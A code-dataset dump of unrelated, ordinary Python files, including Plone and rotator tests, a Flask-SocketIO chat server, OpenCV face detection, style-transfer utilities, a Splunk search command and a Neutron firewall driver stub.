simple_publication_workflow\n self.portal.portal_workflow.setChainForPortalTypes(\n ['Event'], ['simple_publication_workflow']\n )\n\n def create_event(self, context, id='e1', title='New event', days=(1, 1), start=0, end=1, whole_day=False, open_end=False):\n \"\"\" Creates an event with delta days tuple (start, end) beggining from\n now. The start and end arguments are also treated as delta hours.\n \"\"\"\n delta_start = timedelta(hours=start, days=days[0])\n delta_end = timedelta(hours=end, days=days[1])\n\n start = localized_now() + delta_start\n end = localized_now() + delta_end\n\n EventAccessor.event_type = 'Event'\n acc = EventAccessor.create(\n container=context,\n content_id=id,\n title=title,\n start=start,\n end=end,\n timezone=TZNAME,\n whole_day=whole_day,\n open_end=open_end\n )\n acc.location = u'Graz, Austria'\n\n return context[id]\n\n def renderer(self, context=None, request=None, view=None, manager=None,\n assignment=None):\n context = context or self.portal\n request = request or self.request\n view = view or context.restrictedTraverse('@@plone')\n manager = manager or getUtility(\n IPortletManager,\n name='plone.rightcolumn',\n context=self.portal\n )\n assignment = assignment or esdeveniments.Assignment()\n\n return getMultiAdapter(\n (context, request, view, manager, assignment), IPortletRenderer\n )\n\n def test_basic_event(self):\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n login(self.portal, TEST_USER_NAME)\n\n event = self.create_event(self.folder)\n api.content.transition(event, to_state='published')\n portlet = self.renderer(context=self.folder, assignment=esdeveniments.Assignment())\n portlet.update()\n rd = portlet.render()\n\n near_event = portlet.published_events()\n self.assertTrue(len(near_event) == 1)\n self.assertTrue('e1' in rd)\n\n def test_whole_day_event_spanning_one_day(self):\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n login(self.portal, TEST_USER_NAME)\n\n event = self.create_event(self.folder, whole_day=True)\n api.content.transition(event, to_state='published')\n portlet = self.renderer(context=self.folder, assignment=esdeveniments.Assignment())\n portlet.update()\n rd = portlet.render()\n\n near_event = portlet.published_events()\n self.assertTrue(len(near_event) == 1)\n self.assertTrue('e1' in rd)\n\n def test_whole_day_event_spanning_two_days(self):\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n login(self.portal, TEST_USER_NAME)\n\n event = self.create_event(self.folder, days=(1, 2), whole_day=True)\n api.content.transition(event, to_state='published')\n portlet = self.renderer(context=self.folder, assignment=esdeveniments.Assignment())\n portlet.update()\n rd = portlet.render()\n\n near_event = portlet.published_events()\n self.assertTrue(len(near_event) == 1)\n self.assertTrue('e1' in rd)\n","sub_path":"genweb/core/tests/test_portlet_calendar.py","file_name":"test_portlet_calendar.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"493375669","text":"import smtplib\nimport time\n\n\ndef send_email(subject, msg):\n try:\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.ehlo()\n server.starttls()\n server.login(\"xxx@gmail.com\", \"xxx\")\n message = 'Subject:{}\\n\\n{}'.format(subject, msg)\n server.sendmail(\"xxx@gmail.com\", \"xxx@gmail.com\", message)\n server.quit()\n print(\"Success\")\n except:\n print(\"Email failed to send.\")\n\n\ndef timer(t):\n try:\n when_to_stop = abs(int(t))\n\n except 
KeyboardInterrupt:\n        return\n    except:\n        print(\"Not a number!\")\n        # no valid number was entered, so there is nothing to count down\n        return\n\n    while when_to_stop > 0:\n        m, s = divmod(when_to_stop, 60)\n        h, m = divmod(m, 60)\n        time_left = (str(h).zfill(2) + \":\" + str(m).zfill(2) + \":\" + str(s).zfill(2))\n        print(time_left + \"\\r\", end=\"\")\n        time.sleep(1)\n        when_to_stop -= 1\n\n\nsubject = input(\"Enter Subject Line: \")\nmsg = input(\"Enter message: \")\nt = input(\">> \")\ntimer(t)\nprint(\"Sending Email\")\nsend_email(subject, msg)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"88948735","text":"#!/usr/bin/env python3\n# -*- coding: utf8 -*-\n\"\"\"Coffeethon.py: Helps you keep track of the number of cups of coffee drunk.\"\"\"\n\nimport sys\nimport getopt\n\n__author__ = \"Tom Celestin\"\n__copyright__ = \"Copyright 2018, Planet Earth\"\n\ndef printCups(operation, amount, isWatch):\n    if isWatch == False:\n        if amount == 1:\n            print(\"You \" + operation + \" \" + str(amount) + \" cup of coffee\")\n        else:\n            print(\"You \" + operation + \" \" + str(amount) + \" cups of coffee\")\n    else:\n        if amount == 1:\n            print(\"Today you drank \" + str(amount) + \" cup of coffee\")\n        else:\n            print(\"Today you drank \" + str(amount) + \" cups of coffee\")\ndef manage_file(filename, sum, number):\n    \"\"\"Change value of the coffee counter.\"\"\"\n    number = int(number)\n    file = open(filename, \"r\")\n    current = int(file.read())\n    if sum is True:\n        current += number\n        printCups(\"added\", number, False)\n    else:\n        current -= number\n        printCups(\"removed\", number, False)\n    file.close()\n    file = open(filename, \"w\")\n    file.write(str(current))\n    file.close()\n\n\ndef clear(filename):\n    \"\"\"Reset the counter to 0.\"\"\"\n    file = open(filename, \"w\")\n    file.write(\"0\")\n    file.close()\n\n\ndef watch(filename):\n    \"\"\"Display the counter in a cool way.\"\"\"\n    file = open(filename, \"r\")\n    current = file.read()\n    printCups(\"\", int(current), True)\n    for i in range(int(current)):\n        print(\"☕️\", end=\" \")\n    file.close()\n\n\ndef main(argv):\n    \"\"\"Main function.\"\"\"\n    filename = \"/tmp/coffeethon.txt\"\n\n    try:\n        file = open(filename)\n    except IOError:\n        # If not exists, create the file\n        file = open(filename, 'w+')\n        file.write(\"0\")\n        file.close()\n    try:\n        opts, args = getopt.getopt(\n            argv,\n            \"harcw\",\n            [\n                \"add\",\n                \"remove\",\n                \"clear\",\n                \"watch\"\n            ]\n        )\n    except getopt.GetoptError as e:\n        print(str(e))\n        print('coffeethon.py --add [number]')\n        print('coffeethon.py --remove [number]')\n        print('coffeethon.py --clear')\n        print('coffeethon.py --watch')\n        sys.exit(2)\n    for opt, arg in opts:\n        number = 1\n        if len(sys.argv) > 2:\n            number = sys.argv[2]\n        if opt == '-h':\n            print('coffeethon.py --add [number]')\n            print('coffeethon.py --remove [number]')\n            print('coffeethon.py --clear')\n            print('coffeethon.py --watch')\n            sys.exit()\n        elif opt in (\"-a\", \"--add\"):\n            manage_file(filename, True, number)\n        elif opt in (\"-r\", \"--remove\"):\n            manage_file(filename, False, number)\n        elif opt in (\"-c\", \"--clear\"):\n            clear(filename)\n        elif opt in (\"-w\", \"--watch\"):\n            watch(filename)\n\nif __name__ == \"__main__\":\n    main(sys.argv[1:])\n","sub_path":"coffeethon.py","file_name":"coffeethon.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"417765100","text":"# -*- coding: utf-8 -*-\n# (c) 2008 Gael Pasgrimaud and contributors\n# 
Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php\nfrom setuptools import setup, find_packages\nimport sys, os\n\nversion = '1.2'\n\nlong_description = ''\nlong_description += open('README.txt').read()\nlong_description += '\\n'\n\nfor filename in ('description.txt',\n 'upload.txt',\n 'storage.txt',\n 'paste-factories.txt',\n 'jquery-plugin.txt',\n 'contributors.txt'):\n long_description += open(os.path.join('docs', filename)).read()\n long_description += '\\n'\n\n\nrequires = [\n 'setuptools',\n 'Paste',\n 'WebOb',\n ]\n\nif sys.version_info < (2, 6):\n requires.append('simplejson')\n\nsetup(name='gp.fileupload',\n version=version,\n description=\"A WSGI middleware to get some stats on large files upload,\"\n \"and provide a progress bar for your users\",\n long_description=long_description + \\\n 'News\\n****\\n\\n' +\n open('CHANGES.txt').read(),\n # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n \"Programming Language :: Python\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Topic :: Internet :: WWW/HTTP :: WSGI :: Middleware\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Environment :: Web Environment\",\n \"Programming Language :: Python\",\n \"Programming Language :: JavaScript\",\n ],\n keywords='wsgi middleware upload progress bar',\n author='Gael Pasgrimaud',\n author_email='gael@gawel.org',\n url='http://www.gawel.org/docs/gp.fileupload/',\n license='MIT',\n namespace_packages=['gp'],\n packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),\n package_data={'gp/fileupload': ['static/*',]},\n include_package_data=True,\n zip_safe=False,\n install_requires=requires,\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [paste.app_factory]\n sample = gp.fileupload.sampleapp:make_app\n\n [paste.filter_app_factory]\n main = gp.fileupload:make_app\n demo = gp.fileupload.demo:make_demo\n \"\"\",\n )\n\n","sub_path":"pypi_install_script/gp.fileupload-1.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"257714515","text":"import re\nimport time\n\n#This file takes the information in the interlanguage_links.tsv file and creates a dictionary d\nd = {}\ncode_regex = '(Q\\S.*?)(?:\\s)'\ntitle_regex = '(?:\\s.*?)(?:\\S.*?)(?:\\s.*?)(\\S.*)'\nlanguage_regex = '(?:\\s.*?)(\\S.*?)(?:\\s.*)'\n\ndef get_d():\n return d\n \ndef make_d():\n start = time.time()\n f = open('interlanguage_links.tsv', 'r')\n code = ''\n for line in f:\n language = re.findall(language_regex, line)[0]\n if (language == 'en' or language == 'es'):\n code = re.findall(code_regex, line)[0]\n title = re.findall(title_regex, line)[0]\n d[title] = code\n #print (code)\n end = time.time()\n print (end-start)\n \ndef Qcode_by_title(title):\n q = d[title]\n return q\n \n","sub_path":"interlanguage.py","file_name":"interlanguage.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"207643052","text":"import os\nfrom rotator.rotator import (\n Rotator,\n rotator_settings\n)\nimport pytest\n\n@pytest.mark.asyncio\nasync def test_rotator_must_raise_exception_if_file_does_not_exist():\n with pytest.raises(FileNotFoundError):\n await Rotator().rotate('not/a/real/file/path.log')\n\n\n@pytest.mark.asyncio\nasync def test_rotator_must_not_rotate_small_log_file(\n 
tmp_log,\n):\n open(tmp_log, 'a').close()\n rotation_result = await Rotator().rotate(tmp_log)\n assert rotation_result == (False, tmp_log)\n\n\n@pytest.mark.asyncio\nasync def test_rotator_must_rotate_big_log_file(\n mocker,\n tmp_log,\n):\n with open(tmp_log, 'w') as log:\n log.write(\n str(os.urandom(rotator_settings.MAX_LOG_SIZE + 1))\n )\n from rotator.rotator import os as rotator_os\n rename = mocker.patch.object(rotator_os, 'rename', mocker.Mock())\n system = mocker.patch.object(rotator_os, 'system', mocker.Mock())\n rotation_result = await Rotator().rotate(tmp_log)\n assert rotation_result == (True, tmp_log + '_old')\n assert rename.called_once_with(tmp_log, tmp_log + '_old')\n assert system.called_once_with('kill -USR1 `cat /var/run/nginx.pid`')\n","sub_path":"tests/test_rotator.py","file_name":"test_rotator.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"366829587","text":"# -*- coding: utf-8 -*-\n\n# @Time : 2019/10/16\n# @Author : Lattine\n\n# ======================\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom config import Config\nfrom data_helper import CustomDataset\nfrom utils import AveragerMeter\nfrom models import Model\n\n\nclass Trainer:\n def __init__(self, config):\n self.config = config\n self.net = Model()\n self.writer = SummaryWriter(self.config.logs_path)\n\n def train(self):\n train_data = CustomDataset(config.train_data_lmdb, is_train=True)\n test_data = CustomDataset(config.test_data_lmdb, is_train=True)\n train_data_loader = DataLoader(train_data, batch_size=self.config.batch_size, shuffle=True)\n test_data_loader = DataLoader(test_data, batch_size=self.config.batch_size, shuffle=True)\n\n optimizer = optim.Adam(self.net.parameters(), self.config.lr)\n criterion = nn.CrossEntropyLoss()\n\n loss_avg = AveragerMeter()\n best_eval_loss = 100.0\n for epoch in range(self.config.epoches):\n self.net.train()\n for imgs, labs in train_data_loader:\n optimizer.zero_grad()\n\n preds = self.net(imgs)\n labs = labs.squeeze() # [[0], [1]] => [0, 1]\n loss = criterion(preds, labs)\n loss_avg.add(loss)\n\n loss.backward()\n optimizer.step()\n print(f\"Epoch {epoch + 1}: Loss:{loss_avg.val()}\")\n self.writer.add_scalar(\"Train Loss\", loss_avg.val(), epoch + 1)\n loss_avg.reset()\n\n eval_loss, eval_acc = self.evaluation(test_data_loader, criterion)\n print(f\"Test loss: {eval_loss.val()}, Accuray: {eval_acc * 100}%\")\n self.writer.add_scalar(\"Test Loss\", eval_loss.val(), epoch + 1)\n self.writer.add_scalar(\"Accuracy\", eval_acc, epoch + 1)\n\n # 保存模型 最好的Validation模型\n if eval_loss.val() < best_eval_loss:\n best_eval_loss = eval_loss.val()\n torch.save(self.net.state_dict(), self.config.save_ckpt_file + f\"-{epoch + 1}\")\n\n def evaluation(self, data_loader, criterion, max_iter=100):\n self.net.eval()\n data_iter = iter(data_loader)\n n_correct = 0\n loss_avg = AveragerMeter()\n max_iter = min(max_iter, len(data_loader))\n for _ in range(max_iter):\n images, labels = data_iter.next()\n with torch.no_grad():\n preds = self.net(images)\n labels = labels.squeeze()\n loss = criterion(preds, labels)\n loss_avg.add(loss)\n\n top_val, top_ix = preds.max(-1)\n assert len(top_ix) == len(labels)\n for p, t in zip(top_ix, labels):\n if p == t:\n n_correct += 1\n accuracy = n_correct / (max_iter * self.config.batch_size)\n return loss_avg, accuracy\n\n\nif 
__name__ == '__main__':\n config = Config()\n p = Trainer(config)\n p.train()\n","sub_path":"VC1_表格图片方向分类/process/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"212235542","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import BookStore\nfrom django.core import serializers\nimport simplejson\n\n# Create your views here.\n\ndef bookstore(request):\n bookstores = BookStore.objects\n return render(request,'bookstore.html', {'bookstores' : bookstores})\n\ndef detail(request, bookstore_id):\n store_detail = get_object_or_404(BookStore, pk = bookstore_id)\n return render(request, 'storedetail.html', {'store' : store_detail})\n\ndef realmap(request):\n bookstores = BookStore.objects.all()\n addr = []\n name = []\n for a in bookstores:\n addr.append(a.addr)\n name.append(a.name)\n addrlist = simplejson.dumps(addr)\n namelist = simplejson.dumps(name)\n return render(request, 'realmap.html', {'bs':bookstores, 'bsaddr' : addrlist, 'bsname' : namelist})","sub_path":"bookmap/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"229589205","text":"import sys\nimport splunk\nimport splunklib.client\nimport splunklib.results\nimport splunklib.binding\nfrom splunklib.searchcommands import dispatch, GeneratingCommand, Configuration, Option, Boolean\nimport splunk.mining.dcutils\nfrom asx_lib import ASXLib\nfrom splunk.clilib import cli_common as cli\nimport time\n\n@Configuration(streaming=True, local=True)\nclass ASXUpdate(GeneratingCommand):\n logger = splunk.mining.dcutils.getLogger()\n\n list_all = Option(doc='''\n **Syntax: update_all=\n **Description:** When `true`, retrives all analytics stories from the API.\n Defaults to `false`.\n ''', name='list_all', default=False, validate=Boolean())\n\n story = Option(doc='''\n **Syntax:** **story=****\n **Description:** Story to update.\n ''', name='story', require=False, default=None)\n\n def getURL(self):\n cfg = cli.getConfStanza('asx','settings')\n self.logger.info(\"asxupdate.py - asx_conf: {0}\".format(cfg['api_url']))\n return cfg['api_url']\n\n def generate(self):\n # connect to splunk and start execution\n port = splunk.getDefault('port')\n service = splunklib.client.connect(token=self._metadata.searchinfo.session_key, port=port, owner=\"nobody\",app=\"Splunk_ASX\")\n API_URL = self.getURL()\n asx_lib = ASXLib(service, API_URL)\n self.logger.info(\"asxupdate.py - start\")\n\n if self.list_all:\n self.logger.info(\"asxupdate.py - list all stories\")\n stories = asx_lib.list_analytics_stories()\n for story in stories:\n self.logger.info(\"asxupdate.py - processing story {0}\".format(story['name']))\n\n yield {\n '_time': time.time(),\n 'sourcetype': \"_json\",\n '_raw': {'name': story['name']},\n 'status': \"successfully listed all stories\"\n }\n # only updating specific stories\n if self.story:\n self.logger.info(\"asxupdate.py - stories to update {0}\".format(self.story))\n stories = self.story.split(\",\")\n for story in stories:\n self.logger.info(\"asxupdate.py - updating story {0}\".format(story))\n asx_lib.get_analytics_story(story)\n yield {\n '_time': time.time(),\n 'sourcetype': \"_json\",\n '_raw': story,\n 'status': \"successfully updated story\"\n }\n\n self.logger.info(\"asxupdate.py - COMPLETED\")\n\n def __init__(self):\n super(ASXUpdate, 
self).__init__()\n\ndispatch(ASXUpdate, sys.argv, sys.stdin, sys.stdout, __name__)\n","sub_path":"bin/asxupdate.py","file_name":"asxupdate.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"486870838","text":"from picamera.array import PiRGBArray\nfrom picamera import PiCamera\nfrom std_msgs.msg import String\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom sensor_msgs.msg import Image\nimport rospy\nimport time\nimport cv2\n\n#ROS\nrospy.init_node('opencv_publisher')\npub = rospy.Publisher('/cv_info',String,queue_size=2)\n# Create a CascadeClassifier Object\nface_cascade = cv2.CascadeClassifier('/home/ros/Desktop/Drones/ROS_WS/src/drone_project/src/opencv/model/lbpcascade_frontalface_improved.xml')\n\n# initialize the camera and grab a reference to the raw camera capture\ncamera = PiCamera()\ncamera.resolution = (640, 480)\ncamera.framerate = 32\nrawCapture = PiRGBArray(camera, size=(640, 480))\n# allow the camera to warmup\ntime.sleep(0.1)\n# capture frames from the camera\nfor frame in camera.capture_continuous(rawCapture, format=\"bgr\", use_video_port=True):\n\t# grab the raw NumPy array representing the image, then initialize the timestamp\n\t# and occupied/unoccupied text\n\timage = frame.array\t\n\t\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\t# Search the co-ordinates of the image\n\tfaces = face_cascade.detectMultiScale(gray,\n\t\tscaleFactor = 1.1, minNeighbors = 4)\n\tstr_send = \"\"\n\tfor x,y,w,h in faces:\n\t\tstr_send += str(x)+\",\"+str(y)+\",\"+str(w)+\",\"+str(h)+\",\" \t\t\n\t\tprint(str_send)\n\t\tpub.publish(str_send)\n\t\t\n\t\timage = cv2.rectangle(image, (x,y), (x+w,y+h), (0,255,0), 3)\n\t\tcv2.putText(image, 'face', (x, y),\n\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2) \n\t\t#print(x,\" \",y,\" \",w,\" \",h)\t\n\n\t# show the frame\n\tcv2.imshow(\"Frame\", image)\n\tkey = cv2.waitKey(1) & 0xFF\n\t# clear the stream in preparation for the next frame\n\trawCapture.truncate(0)\n\n\n\t#if the `q` key was pressed, break from the loop\n\tif key == ord(\"q\"):\n\t\tbreak\n","sub_path":"ROS_WS/src/drone_project/src/opencv/cv_image_publisher_rpi_version.py","file_name":"cv_image_publisher_rpi_version.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"226938419","text":"import torch\n\n\ndef calc_mean_std(feat, eps=1e-5):\n \"\"\"\n Calculate the mean and standard deviation of the given feature\n\n Arguments:\n feat (torch.Tensor): The feature to calculate statistics on\n eps (float): A small value added to the variance to avoid division by zero\n\n \"\"\"\n size = feat.size()\n assert (len(size) == 4)\n N, C = size[:2]\n feat_var = feat.view(N, C, -1).var(dim=2) + eps\n feat_std = feat_var.sqrt().view(N, C, 1, 1)\n feat_mean = feat.view(N, C, -1).mean(dim=2).view(N, C, 1, 1)\n return feat_mean, feat_std\n\n\ndef adaptive_instance_normalization(content_feat, style_feat):\n \"\"\"\n AdaIN as presented in Section 5 of Arbitrary Style Transfer in Real-time with Adaptive Instance Normalization by Huang et al.\n \n Arguments:\n content_feat (torch.Tensor): Content feature to normalize\n style_feat (torch.Tensor): Style feature to normalize\n\n \"\"\"\n assert (content_feat.size()[:2] == style_feat.size()[:2])\n size = content_feat.size()\n style_mean, style_std = calc_mean_std(style_feat)\n content_mean, content_std = calc_mean_std(content_feat)\n\n normalized_feat = 
(content_feat - content_mean.expand(\n        size)) / content_std.expand(size)\n    return normalized_feat * style_std.expand(size) + style_mean.expand(size)\n\n\ndef _calc_feat_flatten_mean_std(feat):\n    \"\"\"\n    Return mean and std of feature within channels\n\n    Arguments: \n        feat (torch.Tensor): Feature to compute mean and std\n\n    \"\"\"\n    assert (feat.size()[0] == 3)\n    assert (isinstance(feat, torch.FloatTensor))\n    feat_flatten = feat.view(3, -1)\n    mean = feat_flatten.mean(dim=-1, keepdim=True)\n    std = feat_flatten.std(dim=-1, keepdim=True)\n    return feat_flatten, mean, std\n\n\ndef _mat_sqrt(x):\n    \"\"\"\n    Compute square root of matrix\n\n    Arguments: \n        x (torch.Tensor): Matrix to compute square root of\n\n    \"\"\"\n    U, D, V = torch.svd(x)\n    return torch.mm(torch.mm(U, D.pow(0.5).diag()), V.t())\n\n\ndef coral(source, target):\n    \"\"\"\n    Correlation Alignment Loss as shown in Deep CORAL: Correlation Alignment for Deep Domain Adaptation\n    \n    Arguments:\n        source (torch.Tensor): Source feature\n        target (torch.Tensor): Target feature\n    \"\"\"\n    source_f, source_f_mean, source_f_std = _calc_feat_flatten_mean_std(source)\n    source_f_norm = (source_f - source_f_mean.expand_as(\n        source_f)) / source_f_std.expand_as(source_f)\n    source_f_cov_eye = \\\n        torch.mm(source_f_norm, source_f_norm.t()) + torch.eye(3)\n\n    target_f, target_f_mean, target_f_std = _calc_feat_flatten_mean_std(target)\n    target_f_norm = (target_f - target_f_mean.expand_as(\n        target_f)) / target_f_std.expand_as(target_f)\n    target_f_cov_eye = \\\n        torch.mm(target_f_norm, target_f_norm.t()) + torch.eye(3)\n\n    source_f_norm_transfer = torch.mm(\n        _mat_sqrt(target_f_cov_eye),\n        torch.mm(torch.inverse(_mat_sqrt(source_f_cov_eye)),\n                 source_f_norm)\n    )\n\n    source_f_transfer = source_f_norm_transfer * \\\n        target_f_std.expand_as(source_f_norm) + \\\n        target_f_mean.expand_as(source_f_norm)\n\n    return source_f_transfer.view(source.size())\n","sub_path":"style_transfer/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"512574202","text":"import unittest\n\n\ndef merge_ranges(meetings):\n\n    # Merge meeting ranges\n    meetings = sorted(meetings,key=lambda x:x[0])\n    lst = []\n    curr_val = list(meetings.pop(0))\n\n    #append to the list only when there is no intersection, otherwise keep updating curr_val\n    while meetings!= []:\n        #this \"if\" handles the case where the intervals are overlapping\n        if curr_val[1]>=meetings[0][0]:\n            curr_val[1]=max(curr_val[1],meetings[0][1])\n            meetings.pop(0)\n        else:\n            #no overlap: close out the current interval and start tracking the next one\n            lst.append((curr_val[0],curr_val[1]))\n            curr_val = list(meetings.pop(0))\n\n    #append the last tracked interval; this also covers the case where there is only one element\n    #zero element case can be handled above initially (before entering while)\n    lst.append((curr_val[0],curr_val[1]))\n    return lst\n\n\n# Tests\n\nclass Test(unittest.TestCase):\n\n    def test_meetings_overlap(self):\n        actual = merge_ranges([(1, 3), (2, 4)])\n        expected = [(1, 4)]\n        self.assertEqual(actual, expected)\n\n    def test_meetings_touch(self):\n        actual = merge_ranges([(5, 6), (6, 8)])\n        expected = [(5, 8)]\n        self.assertEqual(actual, expected)\n\n    def test_meeting_contains_other_meeting(self):\n        actual = merge_ranges([(1, 8), (2, 5)])\n        expected = [(1, 8)]\n        self.assertEqual(actual, expected)\n\n    def test_meetings_stay_separate(self):\n        actual = merge_ranges([(1, 3), (4, 8)])\n        expected = [(1, 3), (4, 8)]\n        self.assertEqual(actual, expected)\n\n    def test_multiple_merged_meetings(self):\n        actual = merge_ranges([(1, 
4), (2, 5), (5, 8)])\n expected = [(1, 8)]\n self.assertEqual(actual, expected)\n\n def test_meetings_not_sorted(self):\n actual = merge_ranges([(5, 8), (1, 4), (6, 8)])\n expected = [(1, 4), (5, 8)]\n self.assertEqual(actual, expected)\n\n def test_one_long_meeting_contains_smaller_meetings(self):\n actual = merge_ranges([(1, 10), (2, 5), (6, 8), (9, 10), (10, 12)])\n expected = [(1, 12)]\n self.assertEqual(actual, expected)\n\n def test_sample_input(self):\n actual = merge_ranges([(0, 1), (3, 5), (4, 8), (10, 12), (9, 10)])\n expected = [(0, 1), (3, 8), (9, 12)]\n self.assertEqual(actual, expected)\n\n\nunittest.main(verbosity=2)","sub_path":"MergeInterval.py","file_name":"MergeInterval.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"134563792","text":"import json\nfrom flask import Flask, render_template\nfrom flask_socketio import SocketIO, send, emit, join_room, leave_room\nfrom flask import render_template, request\nimport threading\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app)\n\nconnected_clients = {}\n\nglobal stop_event\nstop_event = threading.Event()\n\ndef long_running_task():\n for _ in range(1000):\n socketio.emit('count', json.dumps({'count': _}), namespace='/count')\n socketio.sleep(1)\n print('Counting', _)\n if stop_event.is_set():\n break\n\n\n@app.route('/', methods=['GET'])\ndef handle_root():\n return render_template('index.html')\n\n\n@app.route('/push', methods=['GET'])\ndef handle_push():\n return json.dumps([str(v) for k, v in connected_clients.items()])\n\n\n@app.route('/push/', methods=['GET'])\ndef handle_push_message(client_id):\n if client_id not in connected_clients.values():\n raise Exception('Client is offline')\n message = request.args.to_dict()['message']\n print('Send [{}] message[{}]'.format(client_id, message))\n socketio.emit('chat message', message, room=client_id, namespace='/chat')\n return 'OK'\n\n\n@socketio.on('connect', namespace='/chat')\ndef handle_chat_connect():\n print('Received connect: ' + str(request.sid))\n\n\n@socketio.on('disconnect', namespace='/chat')\ndef handle_chat_disconnect():\n if request.sid in connected_clients:\n username = connected_clients[request.sid]\n leave_room(username)\n del connected_clients[request.sid]\n socketio.emit('chat message', '{} has left the chat'.format(username), \n namespace='/chat', broadcast=True)\n print('Received disconnect: ' + str(request.sid))\n\n\n@socketio.on('chat join', namespace='/chat')\ndef handle_chat_join(data):\n print('Joined chat: ' + str(data))\n if data and 'username' in data:\n username = data['username']\n connected_clients[request.sid] = username\n join_room(username)\n \n socketio.emit('chat message', '{} joined the chat'.format(username), \n namespace='/chat', broadcast=True)\n\n\n@socketio.on('chat message', namespace='/chat')\ndef handle_chat_message(data):\n print('Received chat message: ' + str(data))\n if data:\n socketio.emit('chat message', \"{}: {}\".format(data['username'], data['message']),\n namespace='/chat', broadcast=True)\n\n\n@socketio.on('connect', namespace='/count')\ndef handle_counter_connect():\n if not connected_clients:\n global stop_event\n stop_event = threading.Event()\n t = socketio.start_background_task(long_running_task)\n print('Listening to the counter: {} on Thread[{}]'.format(request.sid, t))\n else:\n print('Listening to the counter: {}'.format(request.sid))\n connected_clients[request.sid] = 
request.sid\n\n\n@socketio.on('disconnect', namespace='/count')\ndef handle_counter_disconnect():\n if request.sid in connected_clients:\n del connected_clients[request.sid]\n if not connected_clients:\n stop_event.set()\n print('Stopped listening to the counter: ' + str(request.sid))\n\n\n@app.teardown_appcontext\ndef _teardown(*args, **kwargs):\n yield\n stop_event.set()\n\nif __name__ == '__main__':\n socketio.run(app)\n","sub_path":"socket.io/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"562082184","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n#\n# Copyright 2013 Big Switch Networks, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n# @author: Sumit Naiksatam, sumitnaiksatam@gmail.com, Big Switch Networks, Inc.\n# @author: Gary Duan, gduan@varmour.com, vArmour Networks\n\nfrom neutron import manager\nfrom neutron.openstack.common import log as logging\nfrom neutron.plugins.common import constants as consts\nfrom neutron.plugins.varmour.common import varmour_constants as va_consts\nfrom neutron.plugins.varmour.common import varmour_utils as va_utils\nfrom neutron.services.firewall.plugin_drivers import plugin_driver_base\n\nLOG = logging.getLogger(__name__)\n\n\nclass vArmourFWDriver(plugin_driver_base.FWaaSPluginDriverBase):\n\n supported_extension_aliases = [\"fwaas\"]\n\n va_alias = va_consts.VARMOUR_FW_DRIVER_ALIAS\n\n def __init__(self, plugin):\n self.plugin = plugin\n self.l3_plugin = None\n self.l3_driver = None\n self.l3_provider = None\n\n @property\n def _varmour_l3_driver(self):\n if not self.l3_driver:\n self.l3_driver, self.l3_provider = va_utils.get_varmour_l3_driver()\n return self.l3_driver\n\n @property\n def _varmour_l3_provider(self):\n if not self.l3_provider:\n self.l3_driver, self.l3_provider = va_utils.get_varmour_l3_driver()\n return self.l3_provider\n\n @property\n def _l3_plugin(self):\n if not self.l3_plugin:\n self.l3_plugin = manager.NeutronManager.get_service_plugins().get(\n consts.L3_ROUTER_NAT)\n return self.l3_plugin\n\n 